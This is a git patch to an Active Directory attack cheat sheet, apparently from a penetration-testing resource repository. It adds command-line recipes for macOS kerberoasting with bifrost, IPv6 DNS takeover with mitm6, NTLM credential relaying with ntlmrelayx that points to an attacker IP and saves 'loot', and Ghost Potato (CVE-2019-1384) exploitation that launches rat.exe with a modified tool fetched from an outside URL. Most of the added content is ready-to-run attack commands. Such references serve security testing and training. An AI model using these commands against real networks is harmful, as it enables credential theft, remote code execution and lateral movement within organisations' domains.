From 7f266bfda8bfc7ec88cb4bc861478577ced5c9df Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Nov 2019 23:26:13 +0100 Subject: [PATCH] mitm ipv6 + macOS kerberoasting --- .../Active Directory Attack.md | 48 ++++++++++++++++++- 1 file changed, 46 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 9730f3d..0072eeb 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -24,8 +24,10 @@ * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - * [SMB Signing Disabled](#smb-signing-disabled) + * [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) + * [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) * [Drop the MIC](#drop-the-mic) + * [Ghost Potato](#ghost-potato) * [SCF file attack against writeable share](#scf-file-attack-against-writeable-share) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) @@ -64,6 +66,7 @@ * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) ```bash + apt-get install -y libssl-dev libffi-dev python-dev build-essential git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec crackmapexec smb -L crackmapexec smb -M name_module -o VAR=DATA @@ -554,6 +557,12 @@ Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus) .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt ``` +Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost) + +```powershell +./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true +``` + Then crack the ticket with hashcat or john ```powershell @@ -715,7 +724,7 @@ msf > use exploit/windows/smb/smb_relay msf exploit(smb_relay) > show targets ``` -#### SMB Signing Disabled +#### SMB Signing Disabled and IPv4 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. @@ -749,6 +758,23 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ``` + +#### SMB Signing Disabled and IPv6 + +Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. + +```powershell +cme smb $hosts --gen-relay-list relay.txt + +# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 +mitm6 -i eth0 -d $domain + +# spoofing WPAD and relaying NTLM credentials +http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt +or +http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug +``` + #### Drop the MIC > The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP @@ -781,6 +807,18 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' secretsdump.py -k -no-pass second-dc-server.local -just-dc ``` +#### Ghost Potato - CVE-2019-1384 + +Prerequisites: +* User must be a member of the local Administrators group +* User must be a member of the Backup Operators group +* Token must be elevated + +Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip + +```powershell +ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe +``` ### SCF file attack against writeable share @@ -1109,6 +1147,12 @@ $ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab [...] ``` +On macOS you can use `bifrost`. + +```powershell +./bifrost -action dump -source keytab -path test +``` + Connect to the machine using the account and the hash with CME. ```powershell